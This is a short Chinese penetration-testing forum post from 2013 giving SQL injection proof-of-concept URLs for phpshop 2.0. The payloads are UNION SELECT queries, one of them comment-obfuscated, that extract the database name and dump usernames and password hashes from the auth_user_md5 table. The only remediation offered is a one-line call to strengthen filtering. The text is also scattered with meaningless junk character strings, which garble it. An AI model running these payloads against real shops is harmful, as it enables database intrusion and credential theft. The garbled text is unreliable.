中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
  S! v5 Z0 h/ t+ z- V& H
0 t( w* r& V* i* j作者 : By onestree% q" \2 i8 u# F
下载地址 : http://code.google.com/p/phpshop/downloads/list9 R7 a. q6 a0 ]' {0 T1 q, D5 Q( E
测试地址: windows 7 / ubuntu
+ {/ T2 u2 m" a& _+ U6 A5 |9 a 4 E+ D1 S) D' ?6 k! W

/ o, j0 m9 ]# s3 k' H* ?SQLi p0c:
+ W7 p+ {/ i0 C5 U7 q3 }* q# p ' w$ z6 [! }/ [) C- G1 C# ], x3 M
==================
, }  D% D3 g' f5 `% W4 f / }, Q0 }) c, L- v( D5 D
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
) g9 v% P1 \2 Q) q% G, funion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
4 T8 R% f* ?5 k: Y" z; Y% a4 a ' l2 p1 a* D$ o
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
+ {# ~6 U9 i. i1 D9 A
2 M( k1 k. `' R, m7 n" _修复:; B/ E& L' W) {
加强过滤+ m7 K" I' @1 M9 c

  A2 C! i, f6 _/ o6 r. f# V( ~7 n" S- F2 F7 e1 P! q$ A




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2